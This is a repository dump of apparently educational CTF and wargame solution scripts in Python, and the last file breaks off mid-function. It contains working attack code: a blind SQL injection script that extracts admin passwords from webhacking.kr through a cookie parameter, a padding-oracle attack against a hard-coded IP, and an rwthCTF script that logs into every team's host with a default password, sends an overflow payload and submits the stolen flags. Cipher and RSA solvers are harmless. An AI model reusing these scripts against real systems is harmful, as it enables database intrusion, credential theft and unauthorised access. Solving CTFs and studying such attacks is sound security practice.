├── .gitignore
├── .idea
    ├── Exploits-and-Scripts.iml
    ├── encodings.xml
    ├── misc.xml
    ├── modules.xml
    ├── scopes
    │   └── scope_settings.xml
    └── vcs.xml
├── 0ldzombie-Web
    ├── .idea
    │   ├── 0ldzombie-Web.iml
    │   ├── misc.xml
    │   ├── modules.xml
    │   ├── vcs.xml
    │   └── workspace.xml
    ├── 0ldzombie-chall2-blind-injection-cookies.py
    └── 0ldzombie-chall6-base64cookie.py
├── CTF Exploit Scripts
    ├── Oracle_Padding_Attack.py
    └── rwthCTF-2013
├── Mystery Twister Solutions
    ├── Caesar Brute Force.py
    └── Letter to Templars - decryption.py
├── README.md
├── RSA Attacks
    ├── Decoding General RSA.py
    ├── Factorizing RSA(n,e).py
    └── RSA: Common modulus attack.py
└── Web Application Challenge's Solutions
    ├── WAP Challenge 3 - Brute force basic HTTP auth.py
    ├── WAP Challenge 5 - Digest Auth Attack.py
    ├── WAP Challenge 6 - Digest Auth Reloaded.py
    ├── WAP Challenge 7 - Digest Auth Pcap.py
    └── WAP challenge 2  - BRute force http login.py


/.gitignore:
--------------------------------------------------------------------------------
 1 | *.py[cod]
 2 | 
 3 | # C extensions
 4 | *.so
 5 | 
 6 | # Packages
 7 | *.egg
 8 | *.egg-info
 9 | dist
10 | build
11 | eggs
12 | parts
13 | bin
14 | var
15 | sdist
16 | develop-eggs
17 | .installed.cfg
18 | lib
19 | lib64
20 | __pycache__
21 | 
22 | # Installer logs
23 | pip-log.txt
24 | 
25 | # Unit test / coverage reports
26 | .coverage
27 | .tox
28 | nosetests.xml
29 | 
30 | # Translations
31 | *.mo
32 | 
33 | # Mr Developer
34 | .mr.developer.cfg
35 | .project
36 | .pydevproject
37 | 


--------------------------------------------------------------------------------
/.idea/Exploits-and-Scripts.iml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <module type="PYTHON_MODULE" version="4">
 3 |   <component name="NewModuleRootManager">
 4 |     <content url="file://$MODULE_DIR$" />
 5 |     <orderEntry type="inheritedJdk" />
 6 |     <orderEntry type="sourceFolder" forTests="false" />
 7 |     <orderEntry type="module" module-name="Unified-Xploitation-Framework" />
 8 |   </component>
 9 |   <component name="PackageRequirementsSettings">
10 |     <option name="requirementsPath" value="" />
11 |   </component>
12 |   <component name="ReSTService">
13 |     <option name="workdir" value="$MODULE_DIR$/../Doc" />
14 |     <option name="DOC_DIR" value="$MODULE_DIR$/../Doc" />
15 |   </component>
16 |   <component name="TestRunnerService">
17 |     <option name="PROJECT_TEST_RUNNER" value="Unittests" />
18 |   </component>
19 | </module>
20 | 
21 | 


--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="Encoding" useUTFGuessing="true" native2AsciiForPropertiesFiles="false" />
4 | </project>
5 | 
6 | 


--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="ProjectRootManager" version="2" project-jdk-name="Python 3.4.0 (/usr/bin/python3.4)" project-jdk-type="Python SDK" />
4 | </project>
5 | 
6 | 


--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="ProjectModuleManager">
 4 |     <modules>
 5 |       <module fileurl="file://$PROJECT_DIR$/.idea/Python_Exploits.iml" filepath="$PROJECT_DIR$/.idea/Python_Exploits.iml" />
 6 |       <module fileurl="file://$PROJECT_DIR$/../Unified-Xploitation-Framework/.idea/Unified-Xploitation-Framework.iml" filepath="$PROJECT_DIR$/../Unified-Xploitation-Framework/.idea/Unified-Xploitation-Framework.iml" />
 7 |     </modules>
 8 |   </component>
 9 | </project>
10 | 
11 | 


--------------------------------------------------------------------------------
/.idea/scopes/scope_settings.xml:
--------------------------------------------------------------------------------
1 | <component name="DependencyValidationManager">
2 |   <state>
3 |     <option name="SKIP_IMPORT_STATEMENTS" value="false" />
4 |   </state>
5 | </component>


--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="VcsDirectoryMappings">
4 |     <mapping directory="" vcs="Git" />
5 |     <mapping directory="$PROJECT_DIR$/../Unified-Xploitation-Framework" vcs="Git" />
6 |   </component>
7 | </project>
8 | 
9 | 


--------------------------------------------------------------------------------
/0ldzombie-Web/.idea/0ldzombie-Web.iml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <module type="PYTHON_MODULE" version="4">
3 |   <component name="NewModuleRootManager">
4 |     <content url="file://$MODULE_DIR$" />
5 |     <orderEntry type="jdk" jdkName="Python 3.4.0 (/usr/bin/python3.4)" jdkType="Python SDK" />
6 |     <orderEntry type="sourceFolder" forTests="false" />
7 |   </component>
8 | </module>


--------------------------------------------------------------------------------
/0ldzombie-Web/.idea/misc.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="ProjectLevelVcsManager" settingsEditedManually="false">
 4 |     <OptionsSetting value="true" id="Add" />
 5 |     <OptionsSetting value="true" id="Remove" />
 6 |     <OptionsSetting value="true" id="Checkout" />
 7 |     <OptionsSetting value="true" id="Update" />
 8 |     <OptionsSetting value="true" id="Status" />
 9 |     <OptionsSetting value="true" id="Edit" />
10 |     <ConfirmationsSetting value="0" id="Add" />
11 |     <ConfirmationsSetting value="0" id="Remove" />
12 |   </component>
13 |   <component name="ProjectRootManager" version="2" project-jdk-name="Python 3.4.0 (/usr/bin/python3.4)" project-jdk-type="Python SDK" />
14 | </project>


--------------------------------------------------------------------------------
/0ldzombie-Web/.idea/modules.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="ProjectModuleManager">
4 |     <modules>
5 |       <module fileurl="file://$PROJECT_DIR$/.idea/0ldzombie-Web.iml" filepath="$PROJECT_DIR$/.idea/0ldzombie-Web.iml" />
6 |     </modules>
7 |   </component>
8 | </project>


--------------------------------------------------------------------------------
/0ldzombie-Web/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="VcsDirectoryMappings">
4 |     <mapping directory="" vcs="" />
5 |   </component>
6 | </project>


--------------------------------------------------------------------------------
/0ldzombie-Web/.idea/workspace.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="ChangeListManager">
 4 |     <option name="TRACKING_ENABLED" value="true" />
 5 |     <option name="SHOW_DIALOG" value="false" />
 6 |     <option name="HIGHLIGHT_CONFLICTS" value="true" />
 7 |     <option name="HIGHLIGHT_NON_ACTIVE_CHANGELIST" value="false" />
 8 |     <option name="LAST_RESOLUTION" value="IGNORE" />
 9 |   </component>
10 |   <component name="ChangesViewManager" flattened_view="true" show_ignored="false" />
11 |   <component name="CreatePatchCommitExecutor">
12 |     <option name="PATCH_PATH" value="" />
13 |   </component>
14 |   <component name="NamedScopeManager">
15 |     <order />
16 |   </component>
17 |   <component name="ProjectLevelVcsManager" settingsEditedManually="false">
18 |     <OptionsSetting value="true" id="Add" />
19 |     <OptionsSetting value="true" id="Remove" />
20 |     <OptionsSetting value="true" id="Checkout" />
21 |     <OptionsSetting value="true" id="Update" />
22 |     <OptionsSetting value="true" id="Status" />
23 |     <OptionsSetting value="true" id="Edit" />
24 |     <ConfirmationsSetting value="0" id="Add" />
25 |     <ConfirmationsSetting value="0" id="Remove" />
26 |   </component>
27 |   <component name="PropertiesComponent">
28 |     <property name="settings.editor.selected.configurable" value="reference.settingsdialog.project.vagrant" />
29 |     <property name="settings.editor.splitter.proportion" value="0.2" />
30 |   </component>
31 |   <component name="ShelveChangesManager" show_recycled="false" />
32 |   <component name="TaskManager">
33 |     <task active="true" id="Default" summary="Default task">
34 |       <option name="number" value="Default" />
35 |     </task>
36 |     <servers />
37 |   </component>
38 |   <component name="VcsContentAnnotationSettings">
39 |     <option name="myLimit" value="2678400000" />
40 |   </component>
41 |   <component name="XDebuggerManager">
42 |     <breakpoint-manager />
43 |     <watches-manager />
44 |   </component>
45 | </project>


--------------------------------------------------------------------------------
/0ldzombie-Web/0ldzombie-chall2-blind-injection-cookies.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python3.4
  2 | # Written by Anirudh Anand (lucif3r) : email - anirudh@anirudhanand.com
  3 | 
  4 | # This is the solution to 0ldzombie's Webhacking.kr Challenge 2: Blind SQL Injection
  5 | # The script uses requests library in python 3.4
  6 | 
  7 | import re
  8 | import requests
  9 | __author__ = 'lucif3r'
 10 | 
 11 | 
 12 | class Challenge2:
 13 | 
 14 |     def __init__(self):
 15 |         print("[+] Blind SQL injection for 0ldzombie challenge 2")
 16 |         self.PHPSESSID = "Your PHPSESSID HERE"
 17 |         self.board_pass = ""
 18 |         self.admin_pass = ""
 19 |         self.board_pass_length = 0
 20 |         self.admin_pass_length = 0
 21 |         self.url = "http://webhacking.kr/challenge/web/web-02/"
 22 |         return
 23 | 
 24 |     def length_password(self, user):
 25 |         """
 26 |         This function is try to understand the length of the password of users given as
 27 |         a parameter.
 28 | 
 29 |         :param user:    -> The name of the user whose password length has to find out.
 30 |         :return:
 31 |         """
 32 |         for i in range(1, 15):
 33 |             cookies = dict(PHPSESSID=self.PHPSESSID, time='1434109174 and (select length (password) from ' +
 34 |                                                           str(user) + ') = ' + str(i))
 35 |             req = requests.get(self.url, cookies=cookies)
 36 |             res = req.text
 37 |             temp = re.findall('2070-01-01 09:00:01', res)
 38 | 
 39 |             if temp and user == 'admin':
 40 |                 self.admin_pass_length = i
 41 |                 print('[+] Admin Password length = ' + str(self.admin_pass_length))
 42 |                 break
 43 | 
 44 |             if temp and user == 'FreeB0aRd':
 45 |                 self.board_pass_length = i
 46 |                 print('[+] FreeB0aRd Password length = ' + str(self.board_pass_length))
 47 |                 break
 48 |             temp = []
 49 |         return
 50 | 
 51 |     def crack_password(self, user, pass_len):
 52 |         """
 53 |         This function wil try to crack the password provided the username and the length
 54 |         of the password. Use length_password() to find out the length of the password.
 55 | 
 56 |         :param user:        ->  username of whom the password has to find out
 57 |         :param pass_len:    ->  Length of the password found out for the same user
 58 |         :return:
 59 |         """
 60 |         for j in range(1, pass_len+1):
 61 |             print("[+] Letters more to go: " + str(pass_len+1 - j))
 62 | 
 63 |             for i in range(33, 126):
 64 |                 cookies = dict(PHPSESSID=self.PHPSESSID, time='1434114374 and (select ascii(substr(password, ' + str(j)
 65 |                                                               + ', 1)) from ' + str(user) + ') = ' + str(i))
 66 |                 req = requests.get(self.url, cookies=cookies)
 67 |                 res = req.text
 68 |                 temp = re.findall('2070-01-01 09:00:01', res)
 69 |                 if temp and user == 'admin':
 70 |                     self.admin_pass += chr(i)
 71 |                     print('[+] Admin Password till now = ' + str(self.admin_pass))
 72 |                     break
 73 | 
 74 |                 if temp and user == 'FreeB0aRd':
 75 |                     self.board_pass += chr(i)
 76 |                     print('[+] FreeB0aRd Password till now = ' + str(self.board_pass))
 77 |                     break
 78 |                 temp = []
 79 |         return
 80 | 
 81 |     def print_vaules(self):
 82 |         print("\n ----------------------------------")
 83 |         print("[+] Admin Password Length = " + str(self.admin_pass_length))
 84 |         print("[+] Admin Password = " + str(self.admin_pass))
 85 |         print("[+] FreeB0aRd Password Length = " + str(self.board_pass_length))
 86 |         print("[+] FreeB0aRd Password = " + str(self.board_pass))
 87 |         print(" ---------------------------------- \n")
 88 | 
 89 | 
 90 | def main():
 91 |     challenge = Challenge2()
 92 |     challenge.length_password('admin')
 93 |     challenge.length_password('FreeB0aRd')
 94 |     challenge.crack_password('admin', 10)
 95 |     challenge.crack_password('FreeB0aRd', 9)
 96 |     challenge.print_vaules()
 97 | 
 98 | if __name__ == '__main__':
 99 |     main()
100 | 


--------------------------------------------------------------------------------
/0ldzombie-Web/0ldzombie-chall6-base64cookie.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3.4
 2 | # Written by Anirudh Anand (lucif3r) : email - anirudh@anirudhanand.com
 3 | 
 4 | # This is the solution to 0ldzombie's Webhacking.kr Challenge 6: Base64 cookie encoding
 5 | # The script uses requests library in python 3.4
 6 | 
 7 | import base64
 8 | 
 9 | __author__ = 'lucif3r'
10 | 
11 | 
12 | class Challenge6:
13 | 
14 |     def __init__(self):
15 |         print("[+] 0ldZombie challenge6: - Base64 Cookie decode \n")
16 |         return
17 | 
18 |     def encode_cookie(self, username, password):
19 | 
20 |         for i in range(1, 21):
21 |             username = base64.b64encode(username)
22 |             password = base64.b64encode(password)
23 | 
24 |         replace = {'1': '!', '2': '@', '3': '$', '4': '^', '5': '&', '6': '*', '7': '(', '8': ')'}
25 | 
26 |         username = self.replace_all(username, replace)
27 |         password = self.replace_all(password, replace)
28 | 
29 |         self.print_all(username, password)
30 |         return
31 | 
32 |     def replace_all(self, string, replace):
33 |         """
34 |         This function will take a dictionary as an input and replaces the values with its keys in the
35 |         strings.
36 | 
37 |         :param string:       ->     The string which should be used to replace characters.
38 |         :param replace:      ->     A dictionary which contains the words to be replaces with their keys
39 |         :return:
40 |         """
41 |         for i, j in replace.iteritems():
42 |             string = string.replace(i, j)
43 | 
44 |         return string
45 | 
46 |     def print_all(self, username, password):
47 |         print("[+] Encoded username to be set as cookie is: \n \n" + username)
48 |         print("\n[+] -------------------------------------------------------------------------------------------[+] \n")
49 |         print("[+] Encoded password to be set as cookie is: \n \n" + password)
50 |         return
51 | 
52 | 
53 | def main():
54 |     challenge6 = Challenge6()
55 |     challenge6.encode_cookie('admin', 'admin')
56 |     return
57 | 
58 | if __name__ == '__main__':
59 |     main()
60 | 
61 | 


--------------------------------------------------------------------------------
/CTF Exploit Scripts/Oracle_Padding_Attack.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python


 2 | 

 3 | import urllib2

 4 | import sys

 5 | import time

 6 | 

 7 | TARGET = 'http://crypto-class.appspot.com/po?er='

 8 | TARGET = 'http://103.10.24.99:31337/checkcreds?enc='

 9 | 

10 | #--------------------------------------------------------------

11 | # padding oracle

12 | #--------------------------------------------------------------

13 | class PaddingOracle(object):

14 |     def query(self, q):

15 |         target = TARGET + urllib2.quote(q)    # Create query URL

16 |         req = urllib2.Request(target)         # Send HTTP request to server

17 |         try:

18 |             f = urllib2.urlopen(req)          # Wait for response

19 |         except urllib2.HTTPError, e:          

20 |             if e.code == 404:

21 |                 return True # good padding

22 |             return False # bad padding

23 | 

24 | def strxor(a, b):

25 |     return [chr(ord(aa) ^ ord(bb)) for aa, bb in zip(a, b)]

26 | 

27 | 

28 | po = PaddingOracle()

29 | 


30 | c = '0b7b68f99e5bb9e4767649f71f335a02f25f06c581c7c920b015ca5c6544428b6a49fabe1f480174127267fb72c5f514'   #Initial Key (If available)

31 | c = c.decode('HEX')

32 | 

33 | g = list('\0' * (len(c)))

34 | 

35 | for block in range(len(c) / 16, 0, -1):

36 |     for p in range(15, -1, -1):

37 |         for i in range(0, 256):

38 |             pos = (block-2) * 16 + p

39 |             g[pos] = chr(i)

40 |             sg = list(g)

41 |             for q in range((block-1) * 16, len(c)):

42 |                 sg[q] = '\0'

43 |             fillchar = chr(16 - p)

44 |             padstr = '\0' * (pos) + fillchar * (16-p) + '\0' * 16

45 |             outstr = strxor(c, strxor(sg, padstr))

46 | 

47 |             #print 'sg=' + ''.join(sg).encode('HEX')

48 |             #print ' p=' + padstr.encode('HEX')

49 |             #print ' o=' + ''.join(outstr).encode('HEX')

50 | 

51 |             sys.stdout.write('#(%2d, %2d) = [%3d] = %2x: %s\r' % (block, p, pos, i,''.join(g)))

52 |             sys.stdout.flush()

53 | 

54 |             if po.query(''.join(outstr).encode('HEX')):

55 |                 break

56 | 

57 |             if i >= 255:

58 |                 g[pos] = chr(16 - p)

59 | 

60 | 

61 | print "The g is '%s'" % ''.join(g)

62 | print "    (HEX) %s" % ''.join(g).encode('HEX')

63 | 

64 | 

65 | # vim: ts=4 sw=4 et
66 | 


--------------------------------------------------------------------------------
/CTF Exploit Scripts/rwthCTF-2013:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | import re
 3 | import telnetlib
 4 | import time
 5 | from socket import create_connection
 6 | remove = [2,19,37,3,5,6,48,4,8,9,10,26,51,81,105,102,86,87,88,89,90,100,74]
 7 | serv_list= range(0,116)[::-1]
 8 | def submit(flags):
 9 |     t=telnetlib.Telnet("10.23.0.1",1)
10 |     t.get_socket().recv(1024)
11 |     for flag in flags:
12 |         t.write(flag+"\n")
13 |         print flag
14 |         print t.get_socket().recv(1024).strip()
15 |     t.close()
16 |     time.sleep(1)
17 | 
18 | def main():
19 |     for i in serv_list:
20 |       try:
21 |         if i in remove:
22 |             raise Exception("pass..")
23 |         print i
24 |         t = telnetlib.Telnet("10.22.%s.1"%i, 3270,timeout=1)
25 |         s = t.get_socket()
26 |         s.recv(1024)
27 |         s.send("LOGIN Admin qwertys\n")
28 |         t.read_until(">")
29 |         s.recv(1024)
30 |         s.send("TRANS -10000 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 1\n")
31 |         print t.read_until(">")
32 |         s.send("LOG 1\n")
33 |         t.read_until("->")
34 |         data = s.recv(1024)
35 |         print data
36 |         lst = re.findall(r"([a-f\d]{16})",data)
37 |         print lst
38 |         submit(lst)
39 |       except:
40 |             pass
41 | if __name__=="__main__":
42 |     while 1:
43 |         main()
44 | 


--------------------------------------------------------------------------------
/Mystery Twister Solutions/Caesar Brute Force.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python3.4
  2 | # Written by Anirudh Anand (lucif3r) : email - anirudh@anirudhanand.com
  3 | 
  4 | # Caesar Brute force.py: A python program to Crack caesar/Rotational ciphers
  5 | # This is a simple python program which helps in cracking Caesar/rotational
  6 | # cipher.The program basically works in the following way (must have 3 args):
  7 | # From the Cipher each character is analysed and is processed accordingly
  8 | # if it is a lower case or an upper case letters.
  9 | 
 10 | #The Non-Alphabetic chars are retained in the decrypted plain text message.
 11 | 
 12 | __author__ = 'lucif3r'
 13 | 
 14 | import argparse
 15 | import sys
 16 | 
 17 | 
 18 | class CipherBrute:
 19 | 
 20 |     def __init__(self):
 21 |         self.plain = ''
 22 | 
 23 |     def cipher_brute(self, rot, cipher):
 24 |         """
 25 |         The function will intake the cipher and possible rotation amount
 26 |         to decrypt it. If a rotation amount is not specified, this will
 27 |         print every possibilities from 1 - 26
 28 | 
 29 |         :rtype : String
 30 |         :param rot: Amount of Rotation to be tested
 31 |         :param cipher: The original Cipher to decrypt
 32 |         :return:
 33 |         """
 34 |         for i in str(cipher):
 35 | 
 36 |             self.non_alpha(i)
 37 | 
 38 |             if i.isupper():  # Calling the upper_brute function if character
 39 |                              # is in upper case
 40 |                 self.upper_brute(i, rot)
 41 | 
 42 |             if i.islower():  # Calling the lower_brute function if character
 43 |                              # is in lower case
 44 |                 self.lower_brute(i, rot)
 45 | 
 46 |             if not i.isalpha():  # If the character is not alphabet, then
 47 |                                  # it is simply added to the decrypted string
 48 |                 self.plain += i
 49 | 
 50 |         return self.plain
 51 | 
 52 |     def non_alpha(self, i):
 53 |         """
 54 |         If the character is non-alphabet, we will leave it as it is and
 55 |         will be simply added to the plain decrypted text also (eg: space)
 56 | 
 57 |         :type self: NULL
 58 |         :param i: Individual character from the cipher string
 59 |         :return:
 60 |         """
 61 |         if i == " ":
 62 |             self.plain += " "
 63 |         return
 64 | 
 65 |     def lower_brute(self, i, rot):
 66 |         """
 67 |         If the cipher character is in lower case, this function will be
 68 |         invoked which checks if the rotation amount goes bigger than the
 69 |         ascii value of z and if so, we are returned it to the beginning.
 70 | 
 71 |         :rtype : None
 72 |         :param i: Individual Character from the cipher string
 73 |         :param rot: Amount of rotation
 74 |         """
 75 |         if ord(i)+rot > 122:
 76 |             self.plain += chr(ord(i)+rot-26)
 77 |         else:
 78 |             self.plain += chr(ord(i) + rot)
 79 |         return
 80 | 
 81 |     def upper_brute(self, i, rot):
 82 |         """
 83 |         If the cipher character is in upper case, this function will be
 84 |         invoked which checks if the rotation amount goes bigger than the
 85 |         ascii value of Z and if so, we are returned it to the beginning.
 86 | 
 87 |         :type self: None
 88 |         :param i: Individual Character from the cipher string
 89 |         :param rot: Amount of Rotation
 90 |         """
 91 |         if ord(i)+rot > 90:
 92 |             self.plain += chr(rot+ord(i)-26)
 93 |         else:
 94 |             self.plain += chr(ord(i) + rot)
 95 | 
 96 |     def print_args(self, i, plain, output=" "):
 97 |         """
 98 |         Function which handles the output. If an output file is specified,
 99 |         then the results in written into the file and is not shown in the
100 |         terminal
101 | 
102 |         :param output: The output file to write (if specified)
103 |         :param i: Individual character in the cipher text
104 |         :param plain: The decrypted plain text
105 |         """
106 |         if output == " ":
107 |                 print("ROT: ", i)
108 |                 print("Decrypted Text: ", plain, "\n")
109 |                 return
110 |         else:
111 |             outfile = open(output, "a")
112 |             outfile.write("Rot: " + str(i) + "\nDecrypted Text: " + str(plain) + "\n \n")
113 |             return
114 | 
115 | 
116 | def main():
117 |     parser = argparse.ArgumentParser(description='To Break the Ceasar/Rotation cipher')
118 |     parser.add_argument('-r', '-rot', type=int,
119 |                         help='Rotation amount (use -a for default:- Will print all the possibilities)')
120 |     parser.add_argument('-c', '-cipher', type=str,
121 |                         help='String to decipher')
122 |     parser.add_argument('-a', '-all', action="count",
123 |                         help='Brute force with All rotations from 1 to 26')
124 |     parser.add_argument('-o', '-output', type=str, default=" ",
125 |                         help='Output the result to a file')
126 |     args = parser.parse_args()
127 | 
128 |     if len(sys.argv) < 3:
129 |         print(''' usage: Caesar Brute Force.py [-h] [-r R] [-c C] [-a]
130 | 
131 | To Break the Ceasar/Rotation cipher
132 | 
133 | optional arguments:
134 |   -h , --help    show this help message and exit
135 |   -r , -rot      Rotation amount (Use -a for default:- Will print all the possibilities)
136 |   -c , -cipher   String to decipher (Should be enclosed in double)
137 |   -a , -all      Brute force with All rotations from 1 to 26 ''')
138 |         exit(0)
139 |     if args.a:
140 |         #if -a parameter is specified, we need to print all possibilities
141 |         #from 0 - 26
142 |         for i in range(1, 26):
143 |             c = CipherBrute()
144 |             plain = c.cipher_brute(i, args.c)
145 |             c.print_args(i, plain, args.o)
146 | 
147 |     else:
148 |         c = CipherBrute()
149 |         plain = c.cipher_brute(args.r, args.c)
150 |         c.print_args(args.r, plain, args.o)
151 | 
152 |     return
153 | 
154 | if __name__ == '__main__':
155 |     main()


--------------------------------------------------------------------------------
/Mystery Twister Solutions/Letter to Templars - decryption.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python3.4
  2 | # Written by Anirudh Anand (lucif3r) : email - anirudh@anirudhanand.com
  3 | 
  4 | # Letter to Templars.py: A python program to de-cipher strings using keys
  5 | # This is a simple python program which helps in cracking Ciphers based on
  6 | # keys. This is written in general to work with any length of keys but is
  7 | # originally written to crack the challenge: Letter to Templars series in
  8 | # Mystery Twister. Challenge url:  http://goo.gl/nwzTr1
  9 | 
 10 | __author__ = 'lucif3r'
 11 | 
 12 | import itertools
 13 | import argparse
 14 | 
 15 | 
 16 | class Templar:
 17 |     def __init__(self):
 18 |         self.plain = ""
 19 | 
 20 |     def crack(self, cipher, key, outfile=""):
 21 |         """
 22 |         This function will intake the cipher text, key and the optional
 23 |         argument outfile (file to which output should be written). The
 24 |         function will first calculate all the possible permutations of
 25 |         the given key and use every single one of them to brute force
 26 |         the cipher.
 27 | 
 28 |         :type outfile: str
 29 |         :param cipher: The cipher text
 30 |         :param key:  Sample key/string which should be used for permuting
 31 |         :param outfile: File to which output should be written (optional)
 32 |         :return:
 33 |         """
 34 |         keys = self.permute_keys(key)
 35 |         for i in keys:
 36 |             j = -1
 37 |             while j < len(cipher) - len(key) + 1:
 38 |                 self.plain += cipher[j + int(i[0])]
 39 |                 self.plain += cipher[j + int(i[1])]
 40 |                 self.plain += cipher[j + int(i[2])]
 41 |                 self.plain += cipher[j + int(i[3])]
 42 |                 j += len(key)
 43 |             self.print_args(i, outfile)
 44 |             self.plain = ""
 45 |         return self.plain
 46 | 
 47 |     def print_args(self, key, outfile=" "):
 48 |         """
 49 |         This will check if an output file is specified in the arguments
 50 |         if so, then the output will be written to the file or else it
 51 |         will be printed on the terminal
 52 | 
 53 |         :param key:
 54 |         :param outfile: File to which output should be written
 55 |         :return:
 56 |         """
 57 |         if outfile == " ":
 58 |             print("Key: ", key)
 59 |             print("Decrypted String: ", self.plain)
 60 |             return
 61 |         else:
 62 |             file = open(outfile, "a")
 63 |             file.write("\nkey: " + key + "\nDecrypted String: " + self.plain + "\n")
 64 |             return
 65 | 
 66 |     def permute_keys(self, words):
 67 |         """
 68 |         This function will return all the permutations of the key which
 69 |         is used to decrypt the cipher.
 70 | 
 71 |         :type words: list
 72 |         :param words: The words which is used to permute
 73 |         :return:
 74 |         """
 75 |         list_pass = [''.join(i) for i in itertools.permutations(words)]
 76 |         print(len(list_pass))
 77 |         return list_pass
 78 | 
 79 | 
 80 | def main():
 81 |     c = Templar()
 82 |     parser = argparse.ArgumentParser(description='To decipher a string using the given key')
 83 |     parser.add_argument('-k', '-key', type=str, default=0,
 84 |                         help='Enter a sample key (we will permutate and give results of all possibilities)')
 85 |     parser.add_argument('-c', '-cipher', type=str, default=" ",
 86 |                         help='File in which the cipher is saved')
 87 |     parser.add_argument('-o', '-output', type=str, default=" ",
 88 |                         help='Output the result to a file')
 89 |     args = parser.parse_args()
 90 | 
 91 |     if args.k == 0:
 92 |         print("Please enter a valid key. Use -h to see help commands")
 93 |         exit(0)
 94 |     if args.c == " ":
 95 |         print("A valid file containing cipher is required. Use -h to see help commands")
 96 |         exit(0)
 97 |     else:
 98 |         try:
 99 |             cipher = open(args.c, "r").readline()
100 |         except FileNotFoundError:
101 |             print("File not Found. Please enter a valid file")
102 | 
103 |     c.crack(cipher, args.k, args.o)
104 |     return
105 | 
106 | 
107 | if __name__ == '__main__':
108 |     main()


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Python_Exploits
2 | ===============
3 | 
4 | Python Scripts and exploits that I have written to solve various challenges including CTF's.
5 | 


--------------------------------------------------------------------------------
/RSA Attacks/Decoding General RSA.py:
--------------------------------------------------------------------------------
 1 | #the cipher must be a file called 'cipher placed in the same directory'
 2 | #Enter the p,q,e and n values.
 3 | p = long(9091213529597818878440658302600437485892608310328358720428512168960411528640933367824950788367956756806141)
 4 | q = long(8143859259110045265727809126284429335877899002167627883200914172429324360133004116702003240828777970252499)
 5 | n = long('E1341893FE6E6816CEC8A970A39C00FA547C7DA2CDEDAB0A62B91C4651A83F96380BCFAEE26F7E866107906389421B1E68D0A17AADC9870B9858E956286E3999E98CEC9881534AC772AE78F5E8ABA1E2F8D3039577029D87',16)
 6 | e = 65537
 7 | 
 8 | phi = (p-1)*(q-1)
 9 | 
10 | def sq(a):
11 |     return a*a
12 | def s2n(s):
13 |     """
14 |     String to number.
15 |     """
16 |     if not len(s):
17 |         return 0
18 |     return int(s.encode("hex"), 16)
19 | 
20 | 
21 | def n2s(n):
22 |     """
23 |     Number to string.
24 |     """
25 |     s = hex(n)[2:].rstrip("L")
26 |     if len(s) % 2 != 0:
27 |         s = "0" + s
28 |     return s.decode("hex")
29 | 
30 | def inverse(a, n):
31 |     t = 0
32 |     newt = 1    
33 |     r = n
34 |     newr = a    
35 |     while newr != 0 :
36 |         quotient = r / newr
37 |         t, newt = (newt, t - quotient * newt) 
38 |         r, newr = (newr, r - quotient * newr)
39 |     if r > 1:
40 |         print "error"
41 | 
42 |     if t < 0:
43 |         t = t + n
44 |     return t
45 | 
46 | def decode(c,d, n):
47 |     """This function asks for a number and decodes it using 'd' and 'n'."""
48 |     return pow(c, d, n)
49 | 
50 | 
51 | def powmy(a,b,c):
52 |     x=1
53 |     y=a
54 |     while b>0 :
55 |         if b%2 == 1:
56 |             x = (x * y)%c
57 |         y= (y*y)%c
58 |         b/=2
59 |     return x%c
60 | 
61 | d = inverse(e,phi)
62 | orig = s2n(open("cipher").read().rstrip())
63 | print n2s(decode(orig,d,n))


--------------------------------------------------------------------------------
/RSA Attacks/Factorizing RSA(n,e).py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # -*- coding: utf8 -*-
 3 |  
 4 | import sys
 5 | import string
 6 | import urllib2
 7 | import urllib
 8 | import gmpy
 9 | def getpass(username):
10 |         # Prepare the data
11 |         query_args = { 'username': username }
12 |         # This urlencodes your data (that's why we need to import urllib at the top)
13 |         data = urllib.urlencode(query_args)
14 |         # Send HTTP POST request
15 |         url = 'http://103.10.24.99/13da382b97c306b7746bfa3681e006d7/register.php'
16 |         request = urllib2.Request(url, data)
17 |         response = urllib2.urlopen(request)
18 |         cookie = response.info()['set-cookie'][11:-8]
19 |         html = response.read()[697:]
20 |         return html, cookie
21 |  
22 |  
23 |  
24 | def str2int(mystr):
25 |         myhex = mystr.encode('hex')
26 |         myint = int(myhex, 16)
27 |         return myint
28 |  
29 | def str2intnew(mystr):
30 |         res = ''
31 |         for char in mystr:
32 |                 res = res + str(ord(char))
33 |         return res
34 |  
35 | def str_int(s):
36 |     a=0
37 |     for i in range(0,len(s)):
38 |         a=a+ord(s[i])*256**i
